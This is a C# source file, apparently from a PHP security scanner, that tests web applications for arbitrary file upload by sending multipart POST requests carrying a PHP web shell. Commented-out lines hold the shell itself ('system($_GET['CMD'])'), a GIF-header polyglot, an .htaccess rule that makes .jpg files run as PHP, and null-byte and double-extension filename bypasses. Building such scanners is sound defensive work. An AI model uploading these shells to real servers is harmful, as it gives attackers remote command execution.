﻿using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.IO;
using System.Web;

namespace PHPScan.ScanAlgorithms
{
    public class FileScanAlgorithm : ScanAlgorithm
    {
        //private const string _phpShell = "<?php echo '<pre>' + system($_GET['CMD']) + '</pre>'; ?>";

        //private string[] _shellFiles = new[]
        //{
        //    //"<?php echo '<pre>' + system($_GET['CMD']) + '</pre>'; ?>",
        //    "\x47\x49\x46\x38\x39\x61\xC2\x01\x73\x01\xF7\xFF\x00\x89\x94\x79\x59\x74\x64\x91\x9B\x84\x6D\x96\x8B\x39\x4C\x42\x87\xCA\xBD\xB4" + _phpShell,
        //    JPEG.Image + _phpShell,
        //    "AddType application/x-httpd-php .jpg\r\n\r\n" +
        //        "Action application/x-httpd-php \"/php/php.exe\"",

        //};

        public override int ModeCount
        {
            //get { return 10; }
            get { return FileScanMode.DefaultModes.Length; }
        }

        private string _server;

        public override string Server
        {
            get { return _server; }
            set { _server = value; }
        }

        FileSystemWatcher _watcher = null;

        //private string _queryString;

        //public override string QueryString
        //{
        //    get { return _queryString; }
        //    set { _queryString = value; }
        //}

        private FileSystemEventArgs _fsArgs;

        public FileSystemEventArgs FsArgs
        {
            get { return _fsArgs; }
            set { _fsArgs = value; }
        }

        public FileScanAlgorithm(string Server)
        {
            _server = Server;            
        }

        public void StartWatching(string Path)
        {
            _watcher = new FileSystemWatcher(Path);
            _watcher.Changed += watcher_FileSystemEvent;
            _watcher.Renamed += watcher_FileSystemEvent;
            _watcher.Created += watcher_FileSystemEvent;
            _watcher.Deleted += watcher_FileSystemEvent;
            _watcher.IncludeSubdirectories = true;
            _watcher.EnableRaisingEvents = true;
        }

        void watcher_FileSystemEvent(object sender, FileSystemEventArgs e)
        {
            if (e is RenamedEventArgs)
                return;

            if (e.Name.ToLower().Contains("shell.php") ||
                e.Name.ToLower().Contains(".htaccess"))
                _fsArgs = e;
            else if (File.Exists(e.Name) && 
                (File.ReadAllText(e.Name).Contains("system($_GET['CMD'])") ||
                File.ReadAllText(e.Name).Contains("application/x-httpd-php .jpg")))
                _fsArgs = e;

            //if (File.Exists(e.Name) && File.ReadAllText(e.Name).Contains("system($_GET['CMD'])"))
            //    _fsArgs = e;
        }

        public override string BuildRequest(int Mode, string TargetFile, FileTrace SourceTrace)
        {
            var scanMode = FileScanMode.DefaultModes[Mode];

            //_fsArgs = null;
            
            //string shellFile;

            //switch (Mode)
            //{
            //    case 0:
            //        shellFile = "shell.php";
            //        break;
            //    case 1:
            //        shellFile = "shell.php%00.gif";
            //        break;
            //    case 2:
            //        shellFile = "shell.php\x00.gif";
            //        break;
            //    case 3:
            //        shellFile = "shell.gif.php";
            //        break;

            //    case 4:
            //        shellFile = "shell.php%00.jpg";
            //        break;
            //    case 5:
            //        shellFile = "shell.php\x00.jpg";
            //        break;
            //    case 6:
            //        shellFile = "shell.jpg.php";
            //        break;

            //    case 7:
            //        shellFile = ".htaccess";
            //        break;
            //    case 8:
            //        shellFile = ".htaccess%00.jpg";
            //        break;
            //    case 9:
            //        shellFile = ".htaccess\x00.jpg";
            //        break;

            //    default:
            //        throw new InvalidOperationException("Invalid mode for FileScanAlgorithm.");
            //}
            //string shellFile = "shell.php";

            string _queryString = "";

            var getFields = new List<string>();

            if (SourceTrace.Calls.Count != 0)
                Console.Write("");

            //foreach (FunctionCall c in SourceTrace.Calls.Where(x =>
            //    (x.Name == "$_GET" || x.Name == "$_REQUEST") &&
            //    x.ParameterValues.Count != 0))
            foreach (FunctionCall c in SourceTrace.Calls.Where(x =>
                (x.Name == "$_GET" || x.Name == "$_REQUEST")))
            {
                if (c.ParameterValues.Count == 0)
                    c.ParameterValues = new List<string> { "shell_file" };

                if (getFields.Contains(c.ParameterValues[0]))
                    continue;

                getFields.Add(c.ParameterValues[0]);

                _queryString += (_queryString.Length != 0 ? "&" : "?") +
                    c.ParameterValues[0] + "=" + HttpUtility.UrlEncode(scanMode.ShellFile);
            }

            var content = "";

            var postFields = new List<string>();

            //foreach (FunctionCall c in SourceTrace.Calls.Where(x =>
            //    x.Name == "$_POST" && x.ParameterValues.Count != 0))
            foreach (FunctionCall c in SourceTrace.Calls.Where(x =>
                x.Name == "$_POST"))
            {
                if (!c.ParameterValues.Any())
                    c.ParameterValues.Add("shell_file");

                if (postFields.Contains(c.ParameterValues[0]))
                    continue;

                postFields.Add(c.ParameterValues[0]);

                content +=
                    "------x\r\n" +
                    "Content-Disposition: form-data; name=\"" + c.ParameterValues[0] + "\"\r\n" +
                    "\r\n" +
                    scanMode.ShellFile + "\r\n";
            }

            var files = SourceTrace.Calls.Where(x => x.Name == "$_FILES");

            if (files.Count() == 0)
                files = new FunctionCall[]
                {
                    new FunctionCall()
                    {
                        ParameterValues = new List<string>() { "shell_file" }
                    }
                };
            else
            {
                Console.ForegroundColor = ConsoleColor.Yellow;
                Console.WriteLine("File Upload detected in " + TargetFile);
                Console.ForegroundColor = ConsoleColor.White;
            }

            var fileFields = new List<string>();

            foreach (FunctionCall c in files)
            {
                if (c.Name == "$_FILES" &&
                    c.ParameterValues.Count == 0)
                    c.ParameterValues = new List<string>{ "shell_file" };
                if (fileFields.Contains(c.ParameterValues[0]))
                    continue;

                fileFields.Add(c.ParameterValues[0]);

                content +=
                    "------x\r\n" +
                    "Content-Disposition: form-data; name=\"" + c.ParameterValues[0] + "\"; " +
                        "filename=\"" + scanMode.ShellFile + "\"\r\n" +                    
                    "Content-Type: " + scanMode.ContentType + "\r\n" +                    
                    "\r\n" +
                    scanMode.Shell + "\r\n";
                //(Mode <= 6 ?
                //        _shellFiles[0] :
                //        _shellFiles[1]) + "\r\n";

                //switch (Mode)
                //{
                //    case 0:
                //    case 1:
                //    case 2:
                //    case 3:
                //        content += _shellFiles[0];
                //        break;
                //    case 4:
                //    case 5:
                //    case 6:
                //        content += _shellFiles[1];
                //        break;
                //    case 7:
                //    case 8:
                //    case 9:
                //        content += _shellFiles[2];
                //        break;

                //}

                //content += "\r\n";
                    
                

                //content +=
                //    "------x\r\n" +
                //    "Content-Disposition: form-data; name=\"" + c.ParameterValues[0] + "\"; filename=\"" + shellFile + "\"\r\n" +
                //    "Content-Type: application/octet-stream\r\n" +
                //    "\r\n" +
                //    "<?php echo 'she' + 'll'; ?>\r\n";
            }



            if (content.Length > 0)
                content +=
                    "------x--\r\n" +
                    "\r\n";

            var header =
                "POST " + TargetFile + _queryString + " HTTP/1.1\r\n" +
                "Host: " + _server + "\r\n" +
                "Proxy-Connection: keep-alive\r\n" +
                "User-Agent: x\r\n" +
                "Content-Length: " + content.Length + "\r\n" +
                "Cache-Control: max-age=0\r\n" +
                "Origin: null\r\n" +
                "Content-Type: multipart/form-data; boundary=----x\r\n" +
                "Accept: text/html\r\n" +
                "Accept-Encoding: gzip,deflate,sdch\r\n" +
                "Accept-Language: en-US,en;q=0.8\r\n" +
                "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n" +
                "\r\n";

            return header + content;
        }

        public override ScanAlert ScanTrace(FileTrace TargetTrace)
        {
            var suspectFunctions = new string[]
            {
                "fopen",
                "file",
                "copy",
                "move_uploaded_file",
                "file_put_contents",
                "fwrite",
                "fputs"
            };

            //var fileCallMatches = TargetTrace.Calls.Where(x => x.Name[0] != '$' &&
            //    suspectFunctions.Contains(x.Name) &&
            //    x.ParameterValues.Count(y => y.Contains("shell.php")) > 0);

            var fileCallMatches = TargetTrace.Calls.Where(x =>
                suspectFunctions.Contains(x.Name) &&
                x.ParameterValues.Any(y => 
                    y.Contains("shell.php") ||
                    y.Contains(".htaccess")));

            if (fileCallMatches.Count() != 0)
            {
                _fsArgs = null;

                return new ScanAlert(ScanAlertOptions.Vulnerability,
                    "Arbitrary File Upload", TargetTrace);                
            }
            else if (_fsArgs != null)
            {
                string eventInfo = string.Format("Type={0} Path={1}",
                    _fsArgs.ChangeType, _fsArgs.FullPath);

                if (_fsArgs is RenamedEventArgs)
                    eventInfo += " Old Path=" +
                        (_fsArgs as RenamedEventArgs).OldFullPath;

                _fsArgs = null;

                return new ScanAlert(ScanAlertOptions.Vulnerability,
                    "Arbitrary File Event - " + eventInfo, TargetTrace);
            }
            else
                return null;
        }

        public override string ToString()
        {
            return "Aribtray File Write/Change/Rename/Delete Scan";
        }
    }    
}
